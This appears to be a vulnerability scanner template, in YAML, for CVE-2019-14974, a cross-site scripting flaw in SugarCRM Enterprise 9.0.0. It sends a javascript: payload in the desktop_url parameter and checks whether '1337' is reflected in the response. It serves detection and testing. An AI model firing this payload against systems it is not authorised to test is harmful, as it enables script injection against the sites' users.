20 lines
410 B
YAML
20 lines
410 B
YAML
id: CVE-2019-14974
|
|
|
|
info:
|
|
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
|
|
author: madrobot
|
|
severity: medium
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "1337"
|
|
part: body
|